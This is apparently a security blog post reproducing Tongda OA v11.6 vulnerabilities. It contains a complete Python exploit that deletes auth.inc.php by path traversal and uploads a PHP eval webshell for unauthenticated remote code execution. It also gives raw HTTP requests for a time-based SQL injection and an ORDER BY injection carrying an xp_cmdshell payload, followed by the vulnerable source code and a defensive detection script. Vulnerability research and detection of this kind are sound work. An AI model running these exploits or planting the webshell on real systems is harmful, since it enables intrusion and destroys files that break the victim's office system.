
Tongda OA 0day reproduction

Several recent 0days in Tongda OA v11.6, following the write-ups by 安译Sec.

Fingerprint
title: 通达OA网络智能办公系统 (Tongda OA Network Intelligent Office System)
vendor: 北京通达信科科技有限公司 (Beijing Tongda Xinke Technology Co., Ltd.)

I. RCE through arbitrary file upload in 11.6

1. Exploit
The exploit is a quick web search away, but note that it deletes auth.inc.php, which breaks normal use of the OA.

```python
import requests

target = "http://10.10.10.130"
payload = "<?php eval($_POST['cmd']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

# Directory traversal in print.php's guid parameter reaches unlink() on auth.inc.php
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url = target + "/inc/auth.inc.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to delete auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
# With the auth include gone, upload.php can be reached without a session
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('shell.php', payload)}
requests.post(url=url, files=files)
url = target + "/_shell.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]File Uploaded Successfully")
    print("[+]URL:", url)
else:
    print("[-]Failed to upload file")
```

2. Vulnerability analysis
The source is Zend 5.4 encoded, so decode it first.
webroot\module\appbuilder\assets\print.php

```php
<?php

$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];

if (file_exists($s_tmp)) {
    $arr_data = unserialize(file_get_contents($s_tmp));
    unlink($s_tmp);
    $s_user = $arr_data["user"];
}
else {
    echo "未知参数";
    exit();
}
```

The GET parameter is never validated, so it allows directory traversal: passing ../../../webroot/inc/auth.inc.php makes unlink() delete that file.
Deleting auth.inc.php bypasses authentication, after which the upload function can be called.

The vulnerabilities below come from 安译Sec's testing of TDOA 11.5; on verification, 11.6 is affected as well.
II. SQL injection

```http
POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 10.10.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=47bc070b; PHPSESSID=8s9lvu5r48t3i8smligo7j8tr4; OA_USER_ID=admin
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
```

Vulnerable file
\general\appbuilder\modules\calendar\models\Calendar.php
In the get_callist_data function the $begin_date variable is not filtered before being used in the query.

```php
public function get_callist_data($begin_date, $end_date, $condition_str)
{
    include_once "inc/utility_org.php";
    $cur_time = modules\calendar\models\date("Y-m-d H:i:s", modules\calendar\models\time());
    $dataBack = array();
    $t_calendar = TD::tablefix("calendar");
    $t_affair = TD::tablefix("affair");
    // $begin_date and $end_date are interpolated directly into the SQL string
    $query = "SELECT * from $t_calendar where (USER_ID='" . $_SESSION["LOGIN_USER_ID"] . "' or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',TAKER) or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',OWNER) or find_in_set('" . $_SESSION["LOGIN_USER_ID"] . "',SHARE_USER))" . $condition_str . " and (CAL_TIME>='$begin_date' and CAL_TIME<='$end_date' || END_TIME>='$begin_date' and END_TIME<='$end_date' || CAL_TIME<='$begin_date' and END_TIME>='$end_date') order by CAL_TIME DESC";
```

III. SQL injection
\general\email\sentbox\get_index_data.php calls the get_sentbox_data function in \inc\utility_email.php; that function simply concatenates the $FIELD parameter after ORDER BY, which results in injection.

```php
$query .= " order by " . $FIELD;
```

```http
GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=exec%20master%20xp_cmdshell%20`ping%2010.10.10.1`%20--&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
Host: 10.10.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=47bc070b; PHPSESSID=8s9lvu5r48t3i8smligo7j8tr4; OA_USER_ID=admin; KEY_RANDOMDATA=19400
Upgrade-Insecure-Requests: 1
```

Same result as in the original article: the comment marker is detected, so the SQL statement cannot be executed here.
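For the detection side, here is an added example (my own code, not from the post or from Tongda) that checks a request against the three patterns shown above: the print.php guid traversal and the repkid traversal used by the upload, SQL in getcallist's starttime/endtime, and a non-identifier orderby on get_index_data.php. The host name and the sample requests are constructed; the finding labels and the SQL keyword list are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the requests above: "../" (print.php guid) and the ".<>./" form the
# upload exploit uses for repkid; an ORDER BY field should be nothing more than a column name.
TRAVERSAL = re.compile(r"\.\.[/\\]|\.<>\.[/\\]")
SAFE_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SQLI_HINT = re.compile(r"\bSLEEP\s*\(|\bAND\b|\bOR\b|--|/\*|'|;", re.IGNORECASE)

def check_request(method: str, url: str, body: str = "") -> list:
    """Return finding labels for one request; an empty list means nothing matched."""
    parts = urlsplit(url)
    path, findings = parts.path.lower(), []
    q = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith("/module/appbuilder/assets/print.php"):
        for guid in q.get("guid", []):
            # assumption: a legitimate guid is a bare file name inside logs/appbuilder/logs
            if TRAVERSAL.search(guid) or "/" in guid or "\\" in guid:
                findings.append("print.php guid traversal (arbitrary file unlink)")
    if path.endswith("/general/data_center/utils/upload.php"):
        for rep in q.get("repkid", []):
            if TRAVERSAL.search(rep):
                findings.append("upload.php repkid traversal (write outside upload dir)")
    if method.upper() == "POST" and path.endswith("/calendar/calendarlist/getcallist"):
        for key in ("starttime", "endtime"):
            for val in parse_qs(body, keep_blank_values=True).get(key, []):
                if SQLI_HINT.search(val):
                    findings.append(f"getcallist {key} carries SQL (time-based injection)")
    if path.endswith("/general/email/sentbox/get_index_data.php"):
        for field in q.get("orderby", []):
            if not SAFE_IDENT.match(field):
                findings.append("get_index_data.php orderby is not a column name (ORDER BY injection)")
    return findings

# Constructed sample requests (method, url, body) modelled on the ones above; not captured traffic.
SAMPLES = [
    ("GET", "http://oa.example.test/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php", ""),
    ("POST", "http://oa.example.test/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./", ""),
    ("POST", "http://oa.example.test/general/appbuilder/web/calendar/calendarlist/getcallist",
     "starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])---&endtime=1598918400&view=month"),
    ("GET", "http://oa.example.test/general/email/sentbox/get_index_data.php?asc=0&orderby=exec%20master%20xp_cmdshell%20--", ""),
    ("GET", "http://oa.example.test/module/appbuilder/assets/print.php?guid=5f4dcc3b", ""),
    ("GET", "http://oa.example.test/general/email/sentbox/get_index_data.php?asc=0&orderby=SEND_TIME", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, check_request(method, url, body) or "clean")
```

The getcallist check needs the POST body, so it only works where request bodies are logged (a WAF or reverse proxy), not from a plain access log.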

References
https://www.freebuf.com/articles/network/247265.html
https://mp.weixin.qq.com/s/lAm-gzqNguFXhSojFFQxDA
https://mp.weixin.qq.com/s/XKZnsdY31N1_6gB9u8Yu8Q